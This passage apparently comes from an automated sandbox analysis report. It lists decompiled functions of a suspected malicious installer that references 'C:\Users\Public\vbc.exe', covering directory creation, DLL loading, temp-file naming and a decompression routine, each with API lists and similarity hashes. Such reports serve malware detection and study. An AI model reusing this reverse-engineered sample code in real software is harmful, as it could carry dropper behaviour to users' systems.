				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405820
0x00405824
0x00405827
0x0040582d
0x00405831
0x00405835
0x0040583d
0x00405844
0x0040584a
0x00405851
0x00405858
0x00405860
0x00405862
0x00000000
0x00405862
0x0040586c
0x00405873
0x00405889
0x00000000
0x00000000
0x00000000
0x0040588b
0x0040588f

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
GetLastError.KERNEL32 ref: 0040586C
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405881
GetLastError.KERNEL32 ref: 0040588B

Strings

C:\Users\Public, xrefs: 00405815
C:\Users\user\AppData\Local\Temp\, xrefs: 0040583B

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\Public
API String ID: 3449924974-2845914341
Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
Instruction ID: d6c2dc8a5c3265a730c97c9ba519fe28ff3708ad137b47d6a6340678ab851e8b
Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
Instruction Fuzzy Hash: 60011A72D00219DADF10DFA1C944BEFBBB8EF04354F04803ADA45B6290E7789658CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004065C3, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065C3(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x004065da
0x004065e3
0x004065e5
0x004065e5
0x004065e9
0x004065fb
0x004065f5
0x004065f5
0x004065f5
0x004065ff
0x00406613
0x00406627
0x0040662e

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065DA
wsprintfA.USER32 ref: 00406613
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627

Strings

%s%s.dll, xrefs: 0040660D
\, xrefs: 004065EB
UXTHEME, xrefs: 004065CC

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
Instruction ID: 9188928b716331f4199fdf2d451d87d069fed8801fbff73d7d84d2de41a49ecb
Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
Instruction Fuzzy Hash: D9F0F6706006097BEB249B68ED0DFEB365CAB08304F1404BEA186E10D1EA78D8358BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040209D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x424818");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x4247e8 =  *0x4247e8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040534F(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b860, "�GB"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004039DB(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040209d
0x0040209d
0x004020a2
0x004020a9
0x00402164
0x004022dd
0x004022dd
0x00402a5a
0x00402a5d
0x00402a69
0x00402a69
0x004020b8
0x004020c2
0x004020c5
0x004020d4
0x004020d8
0x004020de
0x004020e2
0x0040215d
0x00000000
0x0040215d
0x004020e4
0x004020ed
0x004020f1
0x00402135
0x004020f3
0x004020f6
0x004020f9
0x00402129
0x004020fb
0x004020fe
0x00402107
0x00402109
0x00402109
0x00402107
0x004020f9
0x0040213d
0x00402152
0x00402152
0x00000000
0x0040213d
0x004020c8
0x004020ce
0x004020d2
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8

Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053E3
Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053FD
Part of subcall function 0040534F: SendMessageA.USER32 ref: 0040540B

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 004020E8
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,00000000,?,?,00000008,00000001,000000F0), ref: 00402152

Strings

GB, xrefs: 00402112

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: GB
API String ID: 2987980305-3285937634
Opcode ID: 621d8ec26b05587c79b2cea071fc8b0623d7a7a062788e3185bb13ecc113f1ec
Instruction ID: 9b57ca00f45afa7d873c5e4c93812c2e033b3b55bd6b5381131ee912067d0413
Opcode Fuzzy Hash: 621d8ec26b05587c79b2cea071fc8b0623d7a7a062788e3185bb13ecc113f1ec
Instruction Fuzzy Hash: EA212E32600125EBCF207FA48F49B5F76B0AF50358F20423BF211B62D0CBBC49829A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405DF0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DF0(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405df4
0x00405dfa
0x00405dfb
0x00405dfb
0x00405e00
0x00405e01
0x00405e04
0x00405e0e
0x00405e1b
0x00405e1e
0x00405e26
0x00000000
0x00000000
0x00405e2a
0x00000000
0x00000000
0x00405e2c
0x00000000
0x00405e2c
0x00000000

APIs

GetTickCount.KERNEL32(76712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\vbc.exe" ,0040345F,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405E04
GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405E1E

Strings

"C:\Users\Public\vbc.exe" , xrefs: 00405DF0
nsa, xrefs: 00405DFB
C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF3

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1498418707
Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
Instruction ID: dc9f33b0ddeab6bc99614e691558c60e13527be9603daad3520fecf5624fafc7
Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
Instruction Fuzzy Hash: CAF0A7363042087BDB118F59EC45BDB7B9DDF91750F14C03BFA88DA280D6B0D9988798

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405C59(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405BEB(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405892(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058AF(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405815(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015bb
0x004015c2
0x004015c5
0x004015ca
0x004015ce
0x004015d0
0x004015d8
0x004015da
0x004015dc
0x004015e0
0x004015e3
0x004015fb
0x004015fc
0x004015e5
0x004015e5
0x004015e8
0x00000000
0x004015f3
0x004015f4
0x004015f4
0x004015e8
0x00401603
0x0040160a
0x00401617
0x00401617
0x0040160c
0x0040160d
0x00401615
0x00000000
0x00000000
0x00401615
0x0040160a
0x0040161a
0x0040161d
0x0040161f
0x00401620
0x004015d0
0x00401627
0x00401652
0x004022dd
0x00401629
0x0040162b
0x00401636
0x0040163c
0x00401644
0x0040164a
0x0040164a
0x00401644
0x00402a5d
0x00402a69

APIs

Part of subcall function 00405C59: CharNextA.USER32(?), ref: 00405C67
Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 00405815: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401631

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-2935972921
Opcode ID: 81892e281e0bc41ed8071f99871bb6b4c6bb310ff5ad2bafd743c978d2f7bd36
Instruction ID: 7f8751d3726a152fc7b031c4469f223aff892055c158b12f401dbf96511dfde3
Opcode Fuzzy Hash: 81892e281e0bc41ed8071f99871bb6b4c6bb310ff5ad2bafd743c978d2f7bd36
Instruction Fuzzy Hash: EC112B31208151EBDB307FA54D409BF37B0DA92714B28467FE592B22D3D63D4943962E

Uniqueness

Uniqueness Score: -1.00%

Function 00406D5A, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406D5A() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004071C8))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
